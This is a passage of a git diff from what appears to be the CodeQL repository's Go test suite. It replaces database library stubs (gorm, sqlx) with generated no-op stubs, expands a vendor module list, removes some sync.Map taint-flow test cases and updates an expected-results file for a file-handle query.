dest interface{}, query string, args ...interface{}) error { +func (_ *Tx) StmtxContext(_ context.Context, _ interface{}) *Stmt { return nil } -func SelectContext(ctx context.Context, q QueryerContext, dest interface{}, query string, args ...interface{}) error { +func (_ *Tx) Unsafe() *Tx { return nil } diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/tx.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/tx.go deleted file mode 100644 index 38ca8b535314..000000000000 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/jmoiron/sqlx/tx.go +++ /dev/null @@ -1,47 +0,0 @@ -package sqlx - -import ( - "context" - "database/sql" -) - -type Tx struct { - *sql.Tx -} - -func (tx *Tx) Get(dest interface{}, args ...interface{}) error { - return nil -} - -func (tx *Tx) GetContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} - -func (tx *Tx) QueryRowx(args ...interface{}) *Row { - return nil -} - -func (tx *Tx) QueryRowxContext(ctx context.Context, args ...interface{}) *Row { - - return nil -} - -func (tx *Tx) Queryx(args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (tx *Tx) QueryxContext(ctx context.Context, args ...interface{}) (*Rows, error) { - return nil, nil -} - -func (tx *Tx) Select(dest interface{}, args ...interface{}) error { - return nil -} - -func (tx *Tx) SelectContext(ctx context.Context, dest interface{}, args ...interface{}) error { - return nil -} - -func (tx *Tx) NamedQuery(query string, arg interface{}) (*Rows, error) { - return nil, nil -} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/nonexistent/sources/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/nonexistent/sources/stub.go new file mode 100644 index 000000000000..afc57a3900d7 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/nonexistent/sources/stub.go @@ -0,0 +1,5 @@ +package sources + +func Source[T any]() T { + return *new(T) +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/gorm.io/gorm/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/gorm.io/gorm/stub.go index d17686106452..50b332b2a95a 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/gorm.io/gorm/stub.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/gorm.io/gorm/stub.go @@ -1,77 +1,878 @@ +// Code generated by depstubber. DO NOT EDIT. +// This is a simple stub for gorm.io/gorm, strictly for use in testing. + +// See the LICENSE file for information about the licensing of the original library. +// Source: gorm.io/gorm (exports: Association,ConnPool,DB; functions: ) + +// Package gorm is a stub of gorm.io/gorm, generated by depstubber. package gorm import ( - "context" - "database/sql" + context "context" + sql "database/sql" + reflect "reflect" + strings "strings" + sync "sync" + time "time" ) -type DB struct{} +type Association struct { + DB *DB + Relationship interface{} + Unscope bool + Error error +} -func (db *DB) Find(dest interface{}, conds ...interface{}) *DB { - return db +func (_ *Association) Append(_ ...interface{}) error { + return nil } -func (db *DB) FindInBatches(dest interface{}, batchSize int, fc func(tx *DB, batch int) error) *DB { - return db +func (_ *Association) Clear() error { + return nil } -func (db *DB) FirstOrCreate(dest interface{}, conds ...interface{}) *DB { - return db +func (_ *Association) Count() int64 { + return 0 } -func (db *DB) FirstOrInit(dest interface{}, conds ...interface{}) *DB { - return db +func (_ *Association) Delete(_ ...interface{}) error { + return nil } -func (db *DB) First(dest interface{}, conds ...interface{}) *DB { - return db +func (_ *Association) Find(_ interface{}, _ ...interface{}) error { + return nil } -func (db *DB) Model(value interface{}) *DB { - return db +func (_ *Association) Replace(_ ...interface{}) error { + return nil } -func (db *DB) Last(dest interface{}, conds ...interface{}) *DB { - return db +func (_ *Association) Unscoped() *Association { + return nil } -func (db *DB) Pluck(column string, dest interface{}) *DB { - return db +type ColumnType interface { + AutoIncrement() (bool, bool) + ColumnType() (string, bool) + Comment() (string, bool) + DatabaseTypeName() string + DecimalSize() (int64, int64, bool) + DefaultValue() (string, bool) + Length() (int64, bool) + Name() string + Nullable() (bool, bool) + PrimaryKey() (bool, bool) + ScanType() reflect.Type + Unique() (bool, bool) } -func (db *DB) Take(dest interface{}, conds ...interface{}) *DB { - return db +type Config struct { + SkipDefaultTransaction bool + NamingStrategy interface{} + FullSaveAssociations bool + Logger interface{} + NowFunc func() time.Time + DryRun bool + PrepareStmt bool + DisableAutomaticPing bool + DisableForeignKeyConstraintWhenMigrating bool + IgnoreRelationshipsWhenMigrating bool + DisableNestedTransaction bool + AllowGlobalUpdate bool + QueryFields bool + CreateBatchSize int + TranslateError bool + PropagateUnscoped bool + ClauseBuilders map[string]interface{} + ConnPool ConnPool + Dialector + Plugins map[string]Plugin } -func (db *DB) Scan(dest interface{}) *DB { - return db +func (_ Config) BindVarTo(_ interface{}, _ *Statement, _ interface{}) {} + +func (_ Config) DataTypeOf(_ interface{}) string { + return "" } -func (db *DB) ScanRows(rows *sql.Rows, result interface{}) error { +func (_ Config) DefaultValueOf(_ interface{}) interface{} { return nil } -func (db *DB) Row() *sql.Row { +func (_ Config) Explain(_ string, _ ...interface{}) string { + return "" +} + +func (_ Config) Initialize(_ *DB) error { return nil } -func (db *DB) Rows() (*sql.Rows, error) { - return nil, nil +func (_ Config) Migrator(_ *DB) Migrator { + return nil } -type Association struct { - DB *DB +func (_ Config) Name() string { + return "" } -func (a *Association) Find(dest interface{}) *Association { - return a +func (_ Config) QuoteTo(_ interface{}, _ string) {} + +func (_ *Config) AfterInitialize(_ *DB) error { + return nil +} + +func (_ *Config) Apply(_ *Config) error { + return nil } type ConnPool interface { - PrepareContext(ctx context.Context, query string) (*sql.Stmt, error) - ExecContext(ctx context.Context, query string, args ...interface{}) (sql.Result, error) - QueryContext(ctx context.Context, query string, args ...interface{}) (*sql.Rows, error) - QueryRowContext(ctx context.Context, query string, args ...interface{}) *sql.Row + ExecContext(_ context.Context, _ string, _ ...interface{}) (sql.Result, error) + PrepareContext(_ context.Context, _ string) (*sql.Stmt, error) + QueryContext(_ context.Context, _ string, _ ...interface{}) (*sql.Rows, error) + QueryRowContext(_ context.Context, _ string, _ ...interface{}) *sql.Row +} + +type DB struct { + *Config + Error error + RowsAffected int64 + Statement *Statement +} + +func (_ DB) AfterInitialize(_ *DB) error { + return nil +} + +func (_ DB) Apply(_ *Config) error { + return nil +} + +func (_ DB) BindVarTo(_ interface{}, _ *Statement, _ interface{}) {} + +func (_ DB) DataTypeOf(_ interface{}) string { + return "" +} + +func (_ DB) DefaultValueOf(_ interface{}) interface{} { + return nil +} + +func (_ DB) Explain(_ string, _ ...interface{}) string { + return "" +} + +func (_ DB) Initialize(_ *DB) error { + return nil +} + +func (_ DB) Name() string { + return "" +} + +func (_ DB) QuoteTo(_ interface{}, _ string) {} + +func (_ *DB) AddError(_ error) error { + return nil +} + +func (_ *DB) Assign(_ ...interface{}) *DB { + return nil +} + +func (_ *DB) Association(_ string) *Association { + return nil +} + +func (_ *DB) Attrs(_ ...interface{}) *DB { + return nil +} + +func (_ *DB) AutoMigrate(_ ...interface{}) error { + return nil +} + +func (_ *DB) Begin(_ ...*sql.TxOptions) *DB { + return nil } -type Model interface{} +func (_ *DB) Callback() interface{} { + return nil +} + +func (_ *DB) Clauses(_ ...interface{}) *DB { + return nil +} + +func (_ *DB) Commit() *DB { + return nil +} + +func (_ *DB) Connection(_ func(*DB) error) error { + return nil +} + +func (_ *DB) Count(_ *int64) *DB { + return nil +} + +func (_ *DB) Create(_ interface{}) *DB { + return nil +} + +func (_ *DB) CreateInBatches(_ interface{}, _ int) *DB { + return nil +} + +func (_ *DB) DB() (*sql.DB, error) { + return nil, nil +} + +func (_ *DB) Debug() *DB { + return nil +} + +func (_ *DB) Delete(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Distinct(_ ...interface{}) *DB { + return nil +} + +func (_ *DB) Exec(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Find(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) FindInBatches(_ interface{}, _ int, _ func(*DB, int) error) *DB { + return nil +} + +func (_ *DB) First(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) FirstOrCreate(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) FirstOrInit(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Get(_ string) (interface{}, bool) { + return nil, false +} + +func (_ *DB) Group(_ string) *DB { + return nil +} + +func (_ *DB) Having(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) InnerJoins(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) InstanceGet(_ string) (interface{}, bool) { + return nil, false +} + +func (_ *DB) InstanceSet(_ string, _ interface{}) *DB { + return nil +} + +func (_ *DB) Joins(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Last(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Limit(_ int) *DB { + return nil +} + +func (_ *DB) MapColumns(_ map[string]string) *DB { + return nil +} + +func (_ *DB) Migrator() Migrator { + return nil +} + +func (_ *DB) Model(_ interface{}) *DB { + return nil +} + +func (_ *DB) Not(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Offset(_ int) *DB { + return nil +} + +func (_ *DB) Omit(_ ...string) *DB { + return nil +} + +func (_ *DB) Or(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Order(_ interface{}) *DB { + return nil +} + +func (_ *DB) Pluck(_ string, _ interface{}) *DB { + return nil +} + +func (_ *DB) Preload(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Raw(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Rollback() *DB { + return nil +} + +func (_ *DB) RollbackTo(_ string) *DB { + return nil +} + +func (_ *DB) Row() *sql.Row { + return nil +} + +func (_ *DB) Rows() (*sql.Rows, error) { + return nil, nil +} + +func (_ *DB) Save(_ interface{}) *DB { + return nil +} + +func (_ *DB) SavePoint(_ string) *DB { + return nil +} + +func (_ *DB) Scan(_ interface{}) *DB { + return nil +} + +func (_ *DB) ScanRows(_ *sql.Rows, _ interface{}) error { + return nil +} + +func (_ *DB) Scopes(_ ...func(*DB) *DB) *DB { + return nil +} + +func (_ *DB) Select(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Session(_ *Session) *DB { + return nil +} + +func (_ *DB) Set(_ string, _ interface{}) *DB { + return nil +} + +func (_ *DB) SetupJoinTable(_ interface{}, _ string, _ interface{}) error { + return nil +} + +func (_ *DB) Table(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) Take(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) ToSQL(_ func(*DB) *DB) string { + return "" +} + +func (_ *DB) Transaction(_ func(*DB) error, _ ...*sql.TxOptions) error { + return nil +} + +func (_ *DB) Unscoped() *DB { + return nil +} + +func (_ *DB) Update(_ string, _ interface{}) *DB { + return nil +} + +func (_ *DB) UpdateColumn(_ string, _ interface{}) *DB { + return nil +} + +func (_ *DB) UpdateColumns(_ interface{}) *DB { + return nil +} + +func (_ *DB) Updates(_ interface{}) *DB { + return nil +} + +func (_ *DB) Use(_ Plugin) error { + return nil +} + +func (_ *DB) Where(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ *DB) WithContext(_ context.Context) *DB { + return nil +} + +type Dialector interface { + BindVarTo(_ interface{}, _ *Statement, _ interface{}) + DataTypeOf(_ interface{}) string + DefaultValueOf(_ interface{}) interface{} + Explain(_ string, _ ...interface{}) string + Initialize(_ *DB) error + Migrator(_ *DB) Migrator + Name() string + QuoteTo(_ interface{}, _ string) +} + +type Index interface { + Columns() []string + Name() string + Option() string + PrimaryKey() (bool, bool) + Table() string + Unique() (bool, bool) +} + +type Migrator interface { + AddColumn(_ interface{}, _ string) error + AlterColumn(_ interface{}, _ string) error + AutoMigrate(_ ...interface{}) error + ColumnTypes(_ interface{}) ([]ColumnType, error) + CreateConstraint(_ interface{}, _ string) error + CreateIndex(_ interface{}, _ string) error + CreateTable(_ ...interface{}) error + CreateView(_ string, _ ViewOption) error + CurrentDatabase() string + DropColumn(_ interface{}, _ string) error + DropConstraint(_ interface{}, _ string) error + DropIndex(_ interface{}, _ string) error + DropTable(_ ...interface{}) error + DropView(_ string) error + FullDataTypeOf(_ interface{}) interface{} + GetIndexes(_ interface{}) ([]Index, error) + GetTables() ([]string, error) + GetTypeAliases(_ string) []string + HasColumn(_ interface{}, _ string) bool + HasConstraint(_ interface{}, _ string) bool + HasIndex(_ interface{}, _ string) bool + HasTable(_ interface{}) bool + MigrateColumn(_ interface{}, _ interface{}, _ ColumnType) error + MigrateColumnUnique(_ interface{}, _ interface{}, _ ColumnType) error + RenameColumn(_ interface{}, _ string, _ string) error + RenameIndex(_ interface{}, _ string, _ string) error + RenameTable(_ interface{}, _ interface{}) error + TableType(_ interface{}) (TableType, error) +} + +type Plugin interface { + Initialize(_ *DB) error + Name() string +} + +type Session struct { + DryRun bool + PrepareStmt bool + NewDB bool + Initialized bool + SkipHooks bool + SkipDefaultTransaction bool + DisableNestedTransaction bool + AllowGlobalUpdate bool + FullSaveAssociations bool + PropagateUnscoped bool + QueryFields bool + Context context.Context + Logger interface{} + NowFunc func() time.Time + CreateBatchSize int +} + +type Statement struct { + *DB + TableExpr interface{} + Table string + Model interface{} + Unscoped bool + Dest interface{} + ReflectValue reflect.Value + Clauses map[string]interface{} + BuildClauses []string + Distinct bool + Selects []string + Omits []string + ColumnMapping map[string]string + Joins []interface{} + Preloads map[string][]interface{} + Settings sync.Map + ConnPool ConnPool + Schema interface{} + Context context.Context + RaiseErrorOnNotFound bool + SkipHooks bool + SQL strings.Builder + Vars []interface{} + CurDestIndex int +} + +func (_ Statement) AddError(_ error) error { + return nil +} + +func (_ Statement) AfterInitialize(_ *DB) error { + return nil +} + +func (_ Statement) Apply(_ *Config) error { + return nil +} + +func (_ Statement) Assign(_ ...interface{}) *DB { + return nil +} + +func (_ Statement) Association(_ string) *Association { + return nil +} + +func (_ Statement) Attrs(_ ...interface{}) *DB { + return nil +} + +func (_ Statement) AutoMigrate(_ ...interface{}) error { + return nil +} + +func (_ Statement) Begin(_ ...*sql.TxOptions) *DB { + return nil +} + +func (_ Statement) BindVarTo(_ interface{}, _ *Statement, _ interface{}) {} + +func (_ Statement) Callback() interface{} { + return nil +} + +func (_ Statement) Commit() *DB { + return nil +} + +func (_ Statement) Connection(_ func(*DB) error) error { + return nil +} + +func (_ Statement) Count(_ *int64) *DB { + return nil +} + +func (_ Statement) Create(_ interface{}) *DB { + return nil +} + +func (_ Statement) CreateInBatches(_ interface{}, _ int) *DB { + return nil +} + +func (_ Statement) DataTypeOf(_ interface{}) string { + return "" +} + +func (_ Statement) Debug() *DB { + return nil +} + +func (_ Statement) DefaultValueOf(_ interface{}) interface{} { + return nil +} + +func (_ Statement) Delete(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Exec(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Explain(_ string, _ ...interface{}) string { + return "" +} + +func (_ Statement) Find(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) FindInBatches(_ interface{}, _ int, _ func(*DB, int) error) *DB { + return nil +} + +func (_ Statement) First(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) FirstOrCreate(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) FirstOrInit(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Get(_ string) (interface{}, bool) { + return nil, false +} + +func (_ Statement) Group(_ string) *DB { + return nil +} + +func (_ Statement) Having(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Initialize(_ *DB) error { + return nil +} + +func (_ Statement) InnerJoins(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) InstanceGet(_ string) (interface{}, bool) { + return nil, false +} + +func (_ Statement) InstanceSet(_ string, _ interface{}) *DB { + return nil +} + +func (_ Statement) Last(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Limit(_ int) *DB { + return nil +} + +func (_ Statement) MapColumns(_ map[string]string) *DB { + return nil +} + +func (_ Statement) Migrator() Migrator { + return nil +} + +func (_ Statement) Name() string { + return "" +} + +func (_ Statement) Not(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Offset(_ int) *DB { + return nil +} + +func (_ Statement) Omit(_ ...string) *DB { + return nil +} + +func (_ Statement) Or(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Order(_ interface{}) *DB { + return nil +} + +func (_ Statement) Pluck(_ string, _ interface{}) *DB { + return nil +} + +func (_ Statement) Preload(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Raw(_ string, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Rollback() *DB { + return nil +} + +func (_ Statement) RollbackTo(_ string) *DB { + return nil +} + +func (_ Statement) Row() *sql.Row { + return nil +} + +func (_ Statement) Rows() (*sql.Rows, error) { + return nil, nil +} + +func (_ Statement) Save(_ interface{}) *DB { + return nil +} + +func (_ Statement) SavePoint(_ string) *DB { + return nil +} + +func (_ Statement) Scan(_ interface{}) *DB { + return nil +} + +func (_ Statement) ScanRows(_ *sql.Rows, _ interface{}) error { + return nil +} + +func (_ Statement) Scopes(_ ...func(*DB) *DB) *DB { + return nil +} + +func (_ Statement) Select(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) Session(_ *Session) *DB { + return nil +} + +func (_ Statement) Set(_ string, _ interface{}) *DB { + return nil +} + +func (_ Statement) SetupJoinTable(_ interface{}, _ string, _ interface{}) error { + return nil +} + +func (_ Statement) Take(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) ToSQL(_ func(*DB) *DB) string { + return "" +} + +func (_ Statement) Transaction(_ func(*DB) error, _ ...*sql.TxOptions) error { + return nil +} + +func (_ Statement) Update(_ string, _ interface{}) *DB { + return nil +} + +func (_ Statement) UpdateColumn(_ string, _ interface{}) *DB { + return nil +} + +func (_ Statement) UpdateColumns(_ interface{}) *DB { + return nil +} + +func (_ Statement) Updates(_ interface{}) *DB { + return nil +} + +func (_ Statement) Use(_ Plugin) error { + return nil +} + +func (_ Statement) Where(_ interface{}, _ ...interface{}) *DB { + return nil +} + +func (_ Statement) WithContext(_ context.Context) *DB { + return nil +} + +func (_ *Statement) AddClause(_ interface{}) {} + +func (_ *Statement) AddClauseIfNotExists(_ interface{}) {} + +func (_ *Statement) AddVar(_ interface{}, _ ...interface{}) {} + +func (_ *Statement) Build(_ ...string) {} + +func (_ *Statement) BuildCondition(_ interface{}, _ ...interface{}) []interface{} { + return nil +} + +func (_ *Statement) Changed(_ ...string) bool { + return false +} + +func (_ *Statement) Parse(_ interface{}) error { + return nil +} + +func (_ *Statement) ParseWithSpecialTableName(_ interface{}, _ string) error { + return nil +} + +func (_ *Statement) Quote(_ interface{}) string { + return "" +} + +func (_ *Statement) QuoteTo(_ interface{}, _ interface{}) {} + +func (_ *Statement) SelectAndOmitColumns(_ bool, _ bool) (map[string]bool, bool) { + return nil, false +} + +func (_ *Statement) SetColumn(_ string, _ interface{}, _ ...bool) {} + +func (_ *Statement) WriteByte(_ byte) error { + return nil +} + +func (_ *Statement) WriteQuoted(_ interface{}) {} + +func (_ *Statement) WriteString(_ string) (int, error) { + return 0, nil +} + +type TableType interface { + Comment() (string, bool) + Name() string + Schema() string + Type() string +} + +type ViewOption struct { + Replace bool + CheckOption string + Query *DB +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/modules.txt b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/modules.txt index 333381508d66..01fbca5130d4 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/modules.txt +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/modules.txt @@ -1,9 +1,150 @@ -# gorm.io/gorm v1.23.0 +# github.com/astaxie/beego v1.12.3 ## explicit -gorm.io/gorm +github.com/astaxie/beego/orm +# github.com/beego/beego/v2 v2.3.5 +## explicit +github.com/beego/beego/v2/client/orm +# github.com/couchbase/gocb v1.6.7 +## explicit +github.com/couchbase/gocb +# github.com/couchbase/gocb/v2 v2.9.4 +## explicit +github.com/couchbase/gocb/v2 # github.com/jmoiron/sqlx v1.4.0 ## explicit github.com/jmoiron/sqlx -# go.mongodb.org/mongo-driver/mongo v1.17.2 +# github.com/Masterminds/squirrel v1.5.4 +## explicit +github.com/Masterminds/squirrel +# github.com/rqlite/gorqlite v0.0.0-20250128004930-114c7828b55a +## explicit +github.com/rqlite/gorqlite +# go.mongodb.org/mongo-driver v1.17.3 ## explicit go.mongodb.org/mongo-driver/mongo +# gorm.io/gorm v1.25.12 +## explicit +gorm.io/gorm +# github.com/nonexistent/sources v0.0.0-20250300000000-000000000000 +## explicit +github.com/nonexistent/sources +# github.com/couchbase/gocbcore/v10 v10.5.4 +## explicit +github.com/couchbase/gocbcore/v10 +# github.com/couchbase/gocbcoreps v0.1.3 +## explicit +github.com/couchbase/gocbcoreps +# github.com/couchbase/goprotostellar v1.0.2 +## explicit +github.com/couchbase/goprotostellar +# github.com/couchbaselabs/gocbconnstr/v2 v2.0.0-20240607131231-fb385523de28 +## explicit +github.com/couchbaselabs/gocbconnstr/v2 +# github.com/go-logr/logr v1.4.1 +## explicit +github.com/go-logr/logr +# github.com/go-logr/stdr v1.2.2 +## explicit +github.com/go-logr/stdr +# github.com/golang/snappy v0.0.4 +## explicit +github.com/golang/snappy +# github.com/google/uuid v1.6.0 +## explicit +github.com/google/uuid +# github.com/grpc-ecosystem/go-grpc-middleware v1.4.0 +## explicit +github.com/grpc-ecosystem/go-grpc-middleware +# github.com/hashicorp/golang-lru v0.5.4 +## explicit +github.com/hashicorp/golang-lru +# github.com/jinzhu/inflection v1.0.0 +## explicit +github.com/jinzhu/inflection +# github.com/jinzhu/now v1.1.5 +## explicit +github.com/jinzhu/now +# github.com/klauspost/compress v1.16.7 +## explicit +github.com/klauspost/compress +# github.com/montanaflynn/stats v0.7.1 +## explicit +github.com/montanaflynn/stats +# github.com/opentracing/opentracing-go v1.2.0 +## explicit +github.com/opentracing/opentracing-go +# github.com/pkg/errors v0.9.1 +## explicit +github.com/pkg/errors +# github.com/shiena/ansicolor v0.0.0-20200904210342-c7312218db18 +## explicit +github.com/shiena/ansicolor +# github.com/valyala/bytebufferpool v1.0.0 +## explicit +github.com/valyala/bytebufferpool +# github.com/xdg-go/pbkdf2 v1.0.0 +## explicit +github.com/xdg-go/pbkdf2 +# github.com/xdg-go/scram v1.1.2 +## explicit +github.com/xdg-go/scram +# github.com/xdg-go/stringprep v1.0.4 +## explicit +github.com/xdg-go/stringprep +# github.com/youmark/pkcs8 v0.0.0-20240726163527-a2c0da244d78 +## explicit +github.com/youmark/pkcs8 +# go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 +## explicit +go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc +# go.opentelemetry.io/otel v1.24.0 +## explicit +go.opentelemetry.io/otel +# go.opentelemetry.io/otel/metric v1.24.0 +## explicit +go.opentelemetry.io/otel/metric +# go.opentelemetry.io/otel/trace v1.24.0 +## explicit +go.opentelemetry.io/otel/trace +# go.uber.org/multierr v1.11.0 +## explicit +go.uber.org/multierr +# go.uber.org/zap v1.27.0 +## explicit +go.uber.org/zap +# golang.org/x/crypto v0.26.0 +## explicit +golang.org/x/crypto +# golang.org/x/net v0.24.0 +## explicit +golang.org/x/net +# golang.org/x/sync v0.8.0 +## explicit +golang.org/x/sync +# golang.org/x/sys v0.23.0 +## explicit +golang.org/x/sys +# golang.org/x/text v0.17.0 +## explicit +golang.org/x/text +# google.golang.org/genproto/googleapis/rpc v0.0.0-20240401170217-c3f982113cda +## explicit +google.golang.org/genproto/googleapis/rpc +# google.golang.org/grpc v1.63.2 +## explicit +google.golang.org/grpc +# google.golang.org/protobuf v1.34.2 +## explicit +google.golang.org/protobuf +# gopkg.in/couchbase/gocbcore.v7 v7.1.18 +## explicit +gopkg.in/couchbase/gocbcore.v7 +# gopkg.in/couchbaselabs/gocbconnstr.v1 v1.0.4 +## explicit +gopkg.in/couchbaselabs/gocbconnstr.v1 +# gopkg.in/couchbaselabs/gojcbmock.v1 v1.0.4 +## explicit +gopkg.in/couchbaselabs/gojcbmock.v1 +# gopkg.in/couchbaselabs/jsonx.v1 v1.0.1 +## explicit +gopkg.in/couchbaselabs/jsonx.v1 diff --git a/go/ql/test/library-tests/semmle/go/frameworks/StdlibTaintFlow/Sync.go b/go/ql/test/library-tests/semmle/go/frameworks/StdlibTaintFlow/Sync.go index 25a0f7d96d02..d7d1044acd6f 100644 --- a/go/ql/test/library-tests/semmle/go/frameworks/StdlibTaintFlow/Sync.go +++ b/go/ql/test/library-tests/semmle/go/frameworks/StdlibTaintFlow/Sync.go @@ -16,20 +16,6 @@ func TaintStepTest_SyncMapLoadOrStore_B0I0O0(sourceCQL interface{}) interface{} return intoInterface650 } -func TaintStepTest_SyncMapLoadOrStore_B1I0O0(sourceCQL interface{}) interface{} { - fromInterface784 := sourceCQL.(interface{}) - var intoMap957 sync.Map - intoMap957.LoadOrStore(fromInterface784, nil) - return intoMap957 -} - -func TaintStepTest_SyncMapLoadOrStore_B1I0O1(sourceCQL interface{}) interface{} { - fromInterface520 := sourceCQL.(interface{}) - var mediumObjCQL sync.Map - intoInterface443, _ := mediumObjCQL.LoadOrStore(fromInterface520, nil) - return intoInterface443 -} - func TaintStepTest_SyncMapLoadOrStore_B1I1O0(sourceCQL interface{}) interface{} { fromInterface127 := sourceCQL.(interface{}) var intoMap483 sync.Map @@ -44,13 +30,6 @@ func TaintStepTest_SyncMapLoadOrStore_B1I1O1(sourceCQL interface{}) interface{} return intoInterface982 } -func TaintStepTest_SyncMapStore_B0I0O0(sourceCQL interface{}) interface{} { - fromInterface417 := sourceCQL.(interface{}) - var intoMap584 sync.Map - intoMap584.Store(fromInterface417, nil) - return intoMap584 -} - func TaintStepTest_SyncMapStore_B0I1O0(sourceCQL interface{}) interface{} { fromInterface991 := sourceCQL.(interface{}) var intoMap881 sync.Map @@ -58,12 +37,6 @@ func TaintStepTest_SyncMapStore_B0I1O0(sourceCQL interface{}) interface{} { return intoMap881 } -func TaintStepTest_SyncMapSwapinkey(sourceCQL interface{}) interface{} { - var m sync.Map - m.Swap(sourceCQL, "value") - return m -} - func TaintStepTest_SyncMapSwapinvalue(sourceCQL interface{}) interface{} { var m sync.Map m.Swap("key", sourceCQL) @@ -106,16 +79,6 @@ func RunAllTaints_Sync() { out := TaintStepTest_SyncMapLoadOrStore_B0I0O0(source) sink(1, out) } - { - source := newSource(2) - out := TaintStepTest_SyncMapLoadOrStore_B1I0O0(source) - sink(2, out) - } - { - source := newSource(3) - out := TaintStepTest_SyncMapLoadOrStore_B1I0O1(source) - sink(3, out) - } { source := newSource(4) out := TaintStepTest_SyncMapLoadOrStore_B1I1O0(source) @@ -126,11 +89,6 @@ func RunAllTaints_Sync() { out := TaintStepTest_SyncMapLoadOrStore_B1I1O1(source) sink(5, out) } - { - source := newSource(6) - out := TaintStepTest_SyncMapStore_B0I0O0(source) - sink(6, out) - } { source := newSource(7) out := TaintStepTest_SyncMapStore_B0I1O0(source) @@ -146,11 +104,6 @@ func RunAllTaints_Sync() { out := TaintStepTest_SyncPoolPut_B0I0O0(source) sink(9, out) } - { - source := newSource(10) - out := TaintStepTest_SyncMapSwapinkey(source) - sink(10, out) - } { source := newSource(11) out := TaintStepTest_SyncMapSwapinvalue(source) diff --git a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.expected b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.expected index 672e1a5cc8f1..41034c557961 100644 --- a/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.expected +++ b/go/ql/test/query-tests/InconsistentCode/UnhandledCloseWritableHandle/UnhandledCloseWritableHandle.expected @@ -1,48 +1,52 @@ #select -| tests.go:9:8:9:8 | f | tests.go:31:5:31:78 | ... := ...[0] | tests.go:9:8:9:8 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:31:15:31:78 | call to OpenFile | call to OpenFile | -| tests.go:9:8:9:8 | f | tests.go:45:5:45:76 | ... := ...[0] | tests.go:9:8:9:8 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:45:15:45:76 | call to OpenFile | call to OpenFile | -| tests.go:14:3:14:3 | f | tests.go:31:5:31:78 | ... := ...[0] | tests.go:14:3:14:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:31:15:31:78 | call to OpenFile | call to OpenFile | -| tests.go:14:3:14:3 | f | tests.go:45:5:45:76 | ... := ...[0] | tests.go:14:3:14:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:45:15:45:76 | call to OpenFile | call to OpenFile | -| tests.go:56:3:56:3 | f | tests.go:54:5:54:78 | ... := ...[0] | tests.go:56:3:56:3 | f | File handle may be writable as a result of data flow from a $@ and closing it may result in data loss upon failure, which is not handled explicitly. | tests.go:54:15:54:78 | call to 